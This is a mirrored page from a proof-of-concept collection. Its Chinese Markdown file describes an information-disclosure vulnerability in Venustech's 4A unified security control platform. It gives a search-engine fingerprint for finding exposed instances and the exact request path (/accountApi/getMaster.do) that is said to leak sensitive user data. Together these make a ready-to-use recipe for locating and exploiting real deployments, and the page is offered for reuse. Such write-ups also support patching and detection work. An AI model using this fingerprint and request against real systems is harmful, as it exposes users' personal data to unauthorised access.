admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

27 lines
578 B
Markdown
Raw Blame History

# 启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞
## 漏洞描述
启明星辰 4A统一安全管控平台 getMaster.do 接口存在信息泄漏漏洞,通过发送特定请求包可以获取用户敏感信息
## 漏洞影响
启明星辰 4A统一安全管控平台
## 网络测绘
web.body="cas/css/ace-part2.min.css"
## 漏洞复现
登陆页面
![image-20230828144032254](images/image-20230828144032254.png)
验证POC
```
/accountApi/getMaster.do
```
![image-20230828144049975](images/image-20230828144049975.png)
Reference in New Issue View Git Blame Copy Permalink